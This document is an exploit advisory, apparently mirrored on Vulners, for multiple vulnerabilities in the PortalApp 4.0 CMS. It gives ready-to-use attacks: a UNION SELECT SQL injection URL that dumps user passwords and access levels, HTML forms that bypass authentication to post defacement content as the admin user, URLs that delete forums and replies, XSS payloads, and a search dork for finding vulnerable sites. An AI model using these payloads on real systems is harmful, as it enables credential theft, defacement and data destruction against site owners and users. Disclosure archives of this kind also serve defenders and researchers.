Vulners
Lucene search
PortalApp 4.0 (SQL/XSS/Auth Bypasses) Multiple Remote Vulnerabilities
##############################################################################
#Title: PortalApp 4.0 Multiple vulnerabilities #
# #
#Discovered By: r3dm0v3 #
# http://r3dm0v3.persianblog.ir #
# r3dm0v3( 4t }yahoo[dot}com #
# Tehran - Iran #
# #
#Vendor: http://www.portalapp.com #
#Vulnerable Version: 4.0, prior versions maybe vulnerable #
#Remote Exploit: Yes #
#Dork: "Copyright @2007 Iatek LLC" #
#Fix: Not Available #
##############################################################################
##############################################################################
# SQL Injection (CRITICAL) #
##############################################################################
#Description:
PortalApp is a Content Management System (CMS) for websites.
Bug: The user input 'sortby' is directly used in query statement!
#Exploit:
http://site.com/forums.asp?keywords=r3dm0v3&do_search=1&sortby=users.user_name+UNION+SELECT+1,2,3,4,5,password,user_name,8,9,10,user_id,accesslevel,13,14,15+FROM+Users
author will be usernames
topic will be passwords
replies will be username IDs
views will be access levels (5 is super admin)
##############################################################################
# Following actions in 'forum.asp' can take done without any authentication. #
##############################################################################
create a forum:
<html>
<form action=http://site.com/forums.asp?action=insert_level1_edit_disc_forums method=post>
userid:<input type=text name=user_id value=255>by default 255 is sa<br>
ForumName:<input type=text name=ForumName value="H4c|<3d bY r3dm0v3"><br>
Description:<input type=text name=Description value="r3dm0v3 was here. <a href=http://r3dm0v3.persianblog.ir>http://r3dm0v3.persianblog.ir</a>"><br>
ForumSection:<input type=text name=ForumSection value="Hacked"><br>
DisplayOrder:<input type=text name=DisplayOrder value=1><br>
<input type=submit>
</form>
</html>
create a topic:
<html>
<form action=http://site.com/forums.asp?action=insert_level2_edit_disc_topics method=post>
userid:<input type=text name=user_id value=255>by default 255 is sa<br>
ForumID:<input type=text name=ForumId value=><br>
Subject:<input type=text name=Subject value="r3dm0v3."><br>
Message:<br><textarea rows=3 cols=50 name=Message>r3dm0v3 was here.</textarea><br>
Icon:<input type=text name=Icon value=14><br>
Show Signature:<input type=text name=Showsignature value=0><br>
Notify:<input type=text name=Notify ><br>
Locked:<input type=text name=Locked value=1><br>
Sticky:<input type=text name=Sticky ><br>
Date:<input type=text name=DateAdded value="6/1/2008"><br>
DateLast:<input type=text name=DateLast value="6/1/2008"><br>
<input type=submit>
</form>
</html>
delete a forum: http://site.com/forums.asp?action=delete_level1_edit_disc_forums&ForumId=[ForumID]
delete a topic: http://site.com/forums.asp?action=delete_level2_edit_disc_topics&TopicId=[TopicID]
delete a reply: http://site.com/forums.asp?action=delete_level3_edit_disc_replies&ReplyId=[ReplyID]
delete a topic reply: http://site.com/forums.asp?action=delete_level2_disc_replies&TopicId=[TopicID]&ReplyId=[ReplyID]
#There some other actions:
insert_level3_edit_disc_replies
insert_detail_disc_topics
update_level1_edit_disc_forums
update_level2_edit_disc_topics
update_level3_edit_disc_replies
update_detail_disc_topics
update_level2_disc_replies
##############################################################################
#Following actions in 'Content.asp' can take done without any authentication.#
##############################################################################
Add content:
<html>
<form action=http://site.com/content.asp?action=insert_detail_default method=post>
userid:<input type=text name=user_id value=255>by default 255 is sa<br>
ContentTypeID:<input type=text name=ContentTypeID value=2>1:general(company) 2:article 3:lin 4:news 5:announcement 6:download 7:gallery 8:faq ...<br>
catID:<input type=text name=CatID value=198><br>
Date:<input type=text name=DateAdded value="6/1/2008"><br>
Author:<input type=text name=Author value=r3dm0v3><br>
title:<input type=text name=Title value="h4ck3d bY r3dm0v3"><br>
ShortDesc:<br><textarea rows=3 cols=50 name=ShortDesc>r3dm0v3 was here.</textarea><br>
LongDesc:<br><textarea rows=4 cols=50 name=LongDesc>r3dm0v3 was here. http://r3dm0v3.persianblog.ir</textarea><br>
relatedULR<input type=text name=RelatedURL value="http://r3dm0v3.persianblog.ir"><br>
DownloadURL:<input type=text name=DownloadURL><br>
Filename:<input type=text name=Filename><br>
Thumbnail:<input type=text name=Thumbnail><br>
Image1:<input type=text name=Image1><br>
PrevContentID:<input type=text name=PrevContentId><br>
NextContentID:<input type=text name=NextContentId><br>
views:<input type=text name=Impressions value=10000><br>
AVGRating:<input type=text name=AvgRating value=10000><br>
<input type=submit>
</form>
</html>
'insert_detail_content' is also vulnerable. Use above html code for exploit
##############################################################################
# XSS #
##############################################################################
http://site.com/forums.asp?keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1
http://site.com/content.asp?ContentType=General&keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Jan 2008 00:00Current
7.1High risk
Vulners AI Score7.1